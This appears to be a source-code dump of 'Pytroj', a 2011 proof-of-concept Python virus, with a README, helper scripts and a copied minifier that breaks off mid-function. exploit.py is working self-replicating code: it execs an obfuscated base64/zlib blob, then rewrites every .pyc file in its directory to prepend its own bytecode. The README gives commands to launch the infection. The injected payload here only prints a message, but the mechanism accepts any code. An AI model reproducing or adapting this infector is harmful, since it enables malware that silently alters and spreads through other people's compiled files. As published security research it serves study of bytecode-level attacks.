├── b.py
├── c.py
├── filesize.py
├── LICENSE.md
├── README.md
├── exploit.py
├── minify.py
└── byteplay.py


/b.py:
--------------------------------------------------------------------------------
1 | print "Original"
2 | 


--------------------------------------------------------------------------------
/c.py:
--------------------------------------------------------------------------------
1 | print __file__
2 | import inspect
3 | print inspect.getfile(inspect.currentframe())
4 | 
5 | 


--------------------------------------------------------------------------------
/filesize.py:
--------------------------------------------------------------------------------
 1 | import marshal, byteplay
 2 | 
 3 | f = open('exploit.pyc')
 4 | f.read(8)
 5 | data = byteplay.Code.from_code(marshal.loads(f.read()))
 6 | count = 0
 7 | for op, args in data.code:
 8 |     if op == byteplay.SetLineno:
 9 |         count = args
10 | 
11 | print count, len(data.code)
12 | 


--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
 1 | #Pytroj
 2 | ###PoC for trojan in python -- Copyright (C) 2011
 3 | 
 4 |  This library is free software; you can redistribute it and/or
 5 |  modify it under the terms of the GNU Lesser General Public
 6 |  License as published by the Free Software Foundation; either
 7 |  version 2.1 of the License, or (at your option) any later version.
 8 | 
 9 |  This library is distributed in the hope that it will be useful,
10 |  but WITHOUT ANY WARRANTY; without even the implied warranty of
11 |  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
12 |  Lesser General Public License for more details.
13 | 
14 |  You should have received a copy of the GNU Lesser General Public
15 |  License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
16 | 
17 | ###Authors 
18 |  Joey Geralnik
19 |  
20 |  Leon Fedotov
21 |  
22 |  Itzik Kotler
23 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Pytroj
 2 | 
 3 | __Pytroj is a proof of concept attack against .pyc files.__ It searches for other .pyc files and injects itself into them. The injected code can be any python code (in this case it prints "You have been exploited").
 4 | 
 5 | This proof of concept only searches for .pyc files in its own directory. To use it:
 6 | 
 7 |      python -c 'import exploit, b, c'
 8 |      python exploit.pyc
 9 | 
10 | The files b.pyc and c.pyc will now be infected. If you create another .pyc file (for example, python -c 'import byteplay') and run either b.pyc or c.pyc, the new file will also get infected.
11 | 
12 | Another way to run an infected file is to import it once the .pyc file exists:
13 | 
14 |      python -c 'import b'
15 | 
16 | The infected files print out a list of files that they have newly infected, followed by the phrase "You have been exploited"
17 | 
18 | After that, infected programs will continue to execute as normal.
19 | 
20 | [Slides are here](http://www.slideshare.net/DRagonRage519/pytroj-11153381 "slideshare")
21 | 
22 | 
23 | ### On the web
24 | 
 25 | * [Symantec - Python has venom](http://www.symantec.com/connect/blogs/python-has-venom)
 26 | * [Hacker News](http://news.ycombinator.com/item?id=3039439)
 27 | * [Jacob's Tips for Virus Removal](http://jacoblol75.blog.com/2011/10/09/simple-ways-to-get-rid-of-python-pytroj/)
 28 | * [Packet Storm](http://packetstormsecurity.org/files/105385/Pytroj-Tool-Python-Injector.html)
29 | 
30 | For help, questions, or comments, feel free to contact us:
31 | 
32 | 
33 | [Joey Geralnik](https://github.com/jgeralnik "jgeralnik"),
34 | [Leon Fedotov](https://twitter.com/#!/LeonFedotov "Leon Fedotov"),
35 | [Itzik Kotler](https://github.com/ikotler "itzikkotler")
36 | 


--------------------------------------------------------------------------------
/exploit.py:
--------------------------------------------------------------------------------
 1 | signature = "DC9723" #signature is placed at beginning and end of file to identify infected code
 2 | import glob, zlib, base64
 3 | 
 4 | #File only works as a pyc
 5 | if __file__.endswith('.pyc'):
 6 | 	   
 7 |    #The minified version of byteplay
 8 |    exec zlib.decompress(base64.b64decode('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'))
 9 | 
10 |    #Load this file and identify the exploit part
11 |    f = open(__file__, 'r')
12 | 
13 |    #First 8 bytes are magic number and timestamp
14 |    head = f.read(8)
15 | 
16 |    data = Code.from_code(marshal.loads(f.read()))
17 |    f.close()
18 | 
19 |    last_line = 1
20 |    for i in xrange(2, len(data.code)):
21 |       if data.code[i][0] == SetLineno:
22 |          #Find last line of code to update the real code appropriately 
23 |          last_line = data.code[i][1]
24 |       if type(data.code[i][1]) == type('') and data.code[i][1] == signature:
25 |          #Found signature at end of exploit
26 |          EXPLOIT_SIZE = i+1
27 |          break
28 | 
29 |    exploit = data.code[:EXPLOIT_SIZE]
30 | 
31 |    def infect(f_to_infect):
32 |    
33 |       f = open(f_to_infect, 'r')
34 | 
35 |       #Magic number and timestamp
36 |       head = f.read(8)
37 | 
38 |       data = Code.from_code(marshal.loads(f.read()))
39 |       if data.code[1][1] == signature:
40 |          #Code is already infected
41 |          return
42 |    
43 |       print f_to_infect
44 |       f.close()
45 |       lines = []
46 |       for i, op in enumerate(data.code):
47 |          if op[0] == SetLineno:
48 |             #Update line numbers to match with new code
49 |             data.code[i] = (SetLineno, op[1]+last_line)
50 |       
51 |       #Insert exploit
52 |       data.code[:0] = exploit
53 | 
54 |       newfile = open(f_to_infect, 'w')
55 |       newfile.write(head)
56 |       marshal.dump(data.to_code(), newfile)
57 |       newfile.close()
58 |    for i in glob.glob("./*.pyc"):
59 |       infect(i)
60 | 
61 |    print "You have been exploited"
62 | 
63 | signature = "DC9723"
64 | 


--------------------------------------------------------------------------------
/minify.py:
--------------------------------------------------------------------------------
  1 | ## {{{ http://code.activestate.com/recipes/576704/ (r16)
  2 | #!/usr/bin/env python
  3 | # -*- coding: utf-8 -*-
  4 | #
  5 | #       pyminifier.py
  6 | #
  7 | #       Copyright 2009 Dan McDougall <YouKnowWho@YouKnowWhat.com>
  8 | #
  9 | #       This program is free software; you can redistribute it and/or modify
 10 | #       it under the terms of the GNU General Public License as published by
 11 | #       the Free Software Foundation; Version 3 of the License
 12 | #
 13 | #       This program is distributed in the hope that it will be useful,
 14 | #       but WITHOUT ANY WARRANTY; without even the implied warranty of
 15 | #       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 16 | #       GNU General Public License for more details.
 17 | #
 18 | #       You should have received a copy of the GNU General Public License
 19 | #       along with this program; if not, the license can be downloaded here:
 20 | #
 21 | #       http://www.gnu.org/licenses/gpl.html
 22 | 
 23 | # Meta
 24 | __version__ = '1.4.1'
 25 | __license__ = "GNU General Public License (GPL) Version 3"
 26 | __version_info__ = (1, 4, 1)
 27 | __author__ = 'Dan McDougall <YouKnowWho@YouKnowWhat.com>'
 28 | 
 29 | """
 30 | **Python Minifier:**  Reduces the size of (minifies) Python code for use on
 31 | embedded platforms.
 32 | 
 33 | Performs the following:
 34 |      - Removes docstrings.
 35 |      - Removes comments.
 36 |      - Minimizes code indentation.
 37 |      - Joins multiline pairs of parentheses, braces, and brackets (and removes extraneous whitespace within).
 38 |      - Preserves shebangs and encoding info (e.g. "# -- coding: utf-8 --").
 39 | 
 40 | Various examples and edge cases are sprinkled throughout the pyminifier code so
 41 | that it can be tested by minifying itself.  The way to test is thus:
 42 | 
 43 | .. code-block:: bash
 44 | 
 45 |     $ python pyminifier.py pyminifier.py > minified_pyminifier.py
 46 |     $ python minified_pyminifier.py pyminifier.py > this_should_be_identical.py
 47 |     $ diff minified_pyminifier.py this_should_be_identical.py
 48 |     $
 49 | 
 50 | If you get an error executing minified_pyminifier.py or
 51 | 'this_should_be_identical.py' isn't identical to minified_pyminifier.py then
 52 | something is broken.
 53 | """
 54 | 
 55 | import sys, re, cStringIO, tokenize
 56 | from optparse import OptionParser
 57 | 
 58 | # Compile our regular expressions for speed
 59 | multiline_quoted_string = re.compile(r'(\'\'\'|\"\"\")')
 60 | not_quoted_string = re.compile(r'(\".*\'\'\'.*\"|\'.*\"\"\".*\')')
 61 | trailing_newlines = re.compile(r'\n\n')
 62 | shebang = re.compile('^#\!.*$')
 63 | encoding = re.compile(".*coding[:=]\s*([-\w.]+)")
 64 | multiline_indicator = re.compile('\\\\(\s*#.*)?\n')
 65 | # The above also removes trailing comments: "test = 'blah \ # comment here"
 66 | 
 67 | # These aren't used but they're a pretty good reference:
 68 | double_quoted_string = re.compile(r'((?<!\\)".*?(?<!\\)")')
 69 | single_quoted_string = re.compile(r"((?<!\\)'.*?(?<!\\)')")
 70 | single_line_single_quoted_string = re.compile(r"((?<!\\)'''.*?(?<!\\)''')")
 71 | single_line_double_quoted_string = re.compile(r"((?<!\\)'''.*?(?<!\\)''')")
 72 | 
 73 | def remove_comments_and_docstrings(source):
 74 |     """
 75 |     Returns 'source' minus comments and docstrings.
 76 | 
 77 |     **Note**: Uses Python's built-in tokenize module to great effect.
 78 | 
 79 |     Example:
 80 | 
 81 |     .. code-block:: python
 82 | 
 83 |         def noop(): # This is a comment
 84 |             '''
 85 |             Does nothing.
 86 |             '''
 87 |             pass # Don't do anything
 88 | 
 89 |     Will become:
 90 | 
 91 |     .. code-block:: python
 92 | 
 93 |         def noop():
 94 |             pass
 95 |     """
 96 |     io_obj = cStringIO.StringIO(source)
 97 |     out = ""
 98 |     prev_toktype = tokenize.INDENT
 99 |     last_lineno = -1
100 |     last_col = 0
101 |     for tok in tokenize.generate_tokens(io_obj.readline):
102 |         token_type = tok[0]
103 |         token_string = tok[1]
104 |         start_line, start_col = tok[2]
105 |         end_line, end_col = tok[3]
106 |         ltext = tok[4]
107 |         # The following two conditionals preserve indentation.
108 |         # This is necessary because we're not using tokenize.untokenize()
109 |         # (because it spits out code with copious amounts of oddly-placed
110 |         # whitespace).
111 |         if start_line > last_lineno:
112 |             last_col = 0
113 |         if start_col > last_col:
114 |             out += (" " * (start_col - last_col))
115 |         # Remove comments:
116 |         if token_type == tokenize.COMMENT:
117 |             pass
118 |         # This series of conditionals removes docstrings:
119 |         elif token_type == tokenize.STRING:
120 |             if prev_toktype != tokenize.INDENT:
121 |         # This is likely a docstring; double-check we're not inside an operator:
122 |                 if prev_toktype != tokenize.NEWLINE:
123 |                     # Note regarding NEWLINE vs NL: The tokenize module
124 |                     # differentiates between newlines that start a new statement
125 |                     # and newlines inside of operators such as parens, brackes,
126 |                     # and curly braces.  Newlines inside of operators are
127 |                     # NEWLINE and newlines that start new code are NL.
128 |                     # Catch whole-module docstrings:
129 |                     if start_col > 0:
130 |                         # Unlabelled indentation means we're inside an operator
131 |                         out += token_string
132 |                     # Note regarding the INDENT token: The tokenize module does
133 |                     # not label indentation inside of an operator (parens,
134 |                     # brackets, and curly braces) as actual indentation.
135 |                     # For example:
136 |                     # def foo():
137 |                     #     "The spaces before this docstring are tokenize.INDENT"
138 |                     #     test = [
139 |                     #         "The spaces before this string do not get a token"
140 |                     #     ]
141 |         else:
142 |             out += token_string
143 |         prev_toktype = token_type
144 |         last_col = end_col
145 |         last_lineno = end_line
146 |     return out
147 | 
def reduce_operators(source):
    """
    Remove the spaces around operators in 'source' and return the result.

    The source is tokenized and rebuilt one physical line at a time.  For each
    operator token that does not begin a statement, the columns just before
    and just after it are remembered; when the line is complete, any of those
    columns that holds a space has that space deleted.

    Example:

    .. code-block:: python

        def foo(foo, bar, blah):
            test = "This is a %s" % foo

    Will become:

    .. code-block:: python

        def foo(foo,bar,blah):
            test="This is a %s"%foo
    """
    io_obj = cStringIO.StringIO(source)
    # Token types that mean "a new statement starts here".  An operator that
    # follows one of them (a decorator's @, an opening paren) is left alone.
    start_of_line_types = (tokenize.NEWLINE, tokenize.DEDENT, tokenize.INDENT)
    remove_columns = []
    out = ""
    out_line = ""
    prev_toktype = tokenize.INDENT
    last_lineno = -1
    last_col = 0
    # Columns are examined at (col - lshift): starting at 1 makes the "before
    # the operator" entry look at the character preceding it, and every
    # deletion bumps lshift so later columns on the line stay aligned.
    lshift = 1
    for tok in tokenize.generate_tokens(io_obj.readline):
        token_type = tok[0]
        token_string = tok[1]
        start_line, start_col = tok[2]
        end_line, end_col = tok[3]
        if start_line > last_lineno:
            last_col = 0
        # Re-create the whitespace that separated this token from the last.
        if start_col > last_col:
            out_line += " " * (start_col - last_col)
        if (token_type == tokenize.OP
                and prev_toktype not in start_of_line_types):
            # This is just a regular operator; remove spaces
            remove_columns.append(start_col)    # Before OP
            remove_columns.append(end_col + 1)  # After OP
        out_line += token_string
        if token_string.endswith('\n'):
            # The line is complete: apply the recorded deletions.
            for col in remove_columns:
                col = col - lshift
                try:
                    if out_line[col] == " ":  # Only if it is a space
                        out_line = out_line[:col] + out_line[col + 1:]
                        lshift += 1  # To re-align future changes on this line
                except IndexError:  # Reached the end of the line, no biggie
                    pass
            out += out_line
            remove_columns = []
            out_line = ""
            lshift = 1
        prev_toktype = token_type
        last_col = end_col
        last_lineno = end_line
    # This makes sure to capture the last line if it doesn't end in a newline:
    out += out_line
    return out
222 | 
223 | # NOTE: This isn't used anymore...  Just here for reference in case someone
224 | # searches the internet looking for a way to remove similarly-styled end-of-line
225 | # comments from non-python code.  It also acts as an edge case of sorts with
226 | # that raw triple quoted string inside the "quoted_string" assignment.
def remove_comment(single_line):
    """
    Return 'single_line' without its end-of-line comment (if it has one).

    The line is cut into quoted and unquoted sections.  Quoted sections are
    copied verbatim; the first unquoted section containing a '#' is truncated
    at that '#' and everything after it is discarded.  Trailing whitespace is
    stripped from the result.
    """
    quoted_string = re.compile(
        r'''((?<!\\)".*?(?<!\\)")|((?<!\\)'.*?(?<!\\)')'''
    )
    kept = []
    # split() also yields '' and None (for the capture group that did not
    # take part in a match); filter(None, ...) throws both away.
    for section in filter(None, quoted_string.split(single_line)):
        if section[0] in ('"', "'"):
            # A quoted string: a '#' in here is not a comment.
            kept.append(section)
            continue
        code, marker, _ = section.partition('#')
        kept.append(code)
        if marker:
            # Found the comment; nothing after it is worth keeping.
            break
    return "".join(kept).rstrip()
252 | 
def join_multiline_pairs(text, pair="()"):
    """
    Finds and removes newlines inside multiline matching pairs of characters
    in 'text' (parentheses, braces or brackets spread over several lines).

    By default it joins parens () but it will join any two characters given
    via the 'pair' variable (first character opens, second one closes).

    While inside a pair and outside of quotes, runs of spaces are collapsed to
    a single space and spaces directly after the opener are dropped.  Lines
    that belong to a multi-line triple-quoted string are copied through
    untouched.  Finally every doubled newline in the output is reduced to one.

    **Note:** Spaces around operators are not touched here.  Use
    reduce_operators() for that.

    Example:

    .. code-block:: python

        test = (
            "This is inside a multi-line pair of parentheses"
        )

    Will become:

    .. code-block:: python

        test = ("This is inside a multi-line pair of parentheses")
    """
    # Readability variables
    opener = pair[0]
    closer = pair[1]

    # Tracking variables
    inside_pair = False
    inside_quotes = False
    inside_double_quotes = False
    inside_single_quotes = False
    quoted_string = False  # True while inside a multi-line '''/""" string
    openers = 0
    closers = 0

    output = ""

    for line in text.split('\n'):
        escaped = False
        # First we rule out multi-line strings
        multline_match = multiline_quoted_string.search(line)
        not_quoted_string_match = not_quoted_string.search(line)
        if multline_match and not not_quoted_string_match and not quoted_string:
            output += line + '\n'
            # Two occurrences of the same triple quote split the line into
            # three parts: the string opens and closes on this line, so it is
            # just a regular line.  Otherwise a multi-line string starts here.
            # (The old test was always true, so this state was never entered.)
            closed_on_same_line = (len(line.split('"""')) > 2
                                   or len(line.split("'''")) > 2)
            quoted_string = not closed_on_same_line
        elif quoted_string and multiline_quoted_string.search(line):
            # Closing line of a multi-line string
            output += line + '\n'
            quoted_string = False
        elif quoted_string:
            # Body of a multi-line string: leave it alone
            output += line + '\n'
        # Now let's focus on the lines containing our opener and/or closer:
        elif opener in line or closer in line or inside_pair:
            for character in line:
                if character == opener:
                    if not escaped and not inside_quotes:
                        openers += 1
                        inside_pair = True
                    else:
                        escaped = False
                    output += character
                elif character == closer:
                    if not escaped and not inside_quotes:
                        if openers and openers == (closers + 1):
                            # This closer balances the outermost opener
                            closers = 0
                            openers = 0
                            inside_pair = False
                        else:
                            closers += 1
                    else:
                        escaped = False
                    output += character
                elif character == '\\':
                    # A backslash escapes the next character unless it is
                    # itself escaped
                    escaped = not escaped
                    output += character
                elif character in ('"', "'") and escaped:
                    # An escaped quote neither opens nor closes a string
                    escaped = False
                    output += character
                elif character == '"' and inside_quotes:
                    if not inside_single_quotes:
                        inside_quotes = False
                        inside_double_quotes = False
                    output += character
                elif character == "'" and inside_quotes:
                    if not inside_double_quotes:
                        inside_quotes = False
                        inside_single_quotes = False
                    output += character
                elif character == '"':
                    inside_quotes = True
                    inside_double_quotes = True
                    output += character
                elif character == "'":
                    inside_quotes = True
                    inside_single_quotes = True
                    output += character
                elif character == ' ' and inside_pair and not inside_quotes:
                    # Collapse runs of spaces and drop spaces right after the
                    # opener.  output cannot be empty here: inside_pair is
                    # only set after an opener has been appended.
                    if output[-1] not in (' ', opener):
                        output += ' '
                else:
                    escaped = False
                    output += character
            # Only end the line once the pair has been closed; that is what
            # joins the lines of a multi-line pair together.
            if not inside_pair:
                output += '\n'
        else:
            output += line + '\n'

    # Clean up
    output = trailing_newlines.sub('\n', output)

    return output
393 | 
def dedent(source):
    """
    Shrink every indentation level of 'source' down to a single space.

    The source is re-emitted token by token: the first token of each line is
    prefixed with one space per currently open indentation level, and any
    other token that was separated from its predecessor gets exactly one
    space in front of it.

    Example:

    .. code-block:: python

        def foo(bar):
            test = "This is a test"

    Will become:

    .. code-block:: python

        def foo(bar):
         test = "This is a test"
    """
    reader = cStringIO.StringIO(source)
    chunks = []
    depth = 0            # number of currently open indentation levels
    line_seen = -1       # end line of the last emitted token
    col_seen = 0         # end column of the last emitted token
    line_started = 0     # start line of the last emitted token
    for tok in tokenize.generate_tokens(reader.readline):
        kind, text = tok[0], tok[1]
        first_line, first_col = tok[2]
        final_line, final_col = tok[3]
        if first_line > line_seen:
            col_seen = 0
        if kind == tokenize.INDENT:
            # The original indentation text is discarded; only depth matters.
            depth += 1
        elif kind == tokenize.DEDENT:
            depth -= 1
        else:
            if first_line > line_started:
                prefix = " " * depth   # first token on a new line
            elif first_col > col_seen:
                prefix = " "           # tokens were separated by whitespace
            else:
                prefix = ""
            chunks.append(prefix + text)
            line_started = first_line
            col_seen = final_col
            line_seen = final_line
    return "".join(chunks)
443 | 
def fix_empty_methods(source):
    """
    Appends 'pass' to empty methods/functions (i.e. where there was nothing but
    a docstring before we removed it =).

    A 'def' line counts as empty when the next non-blank line is indented no
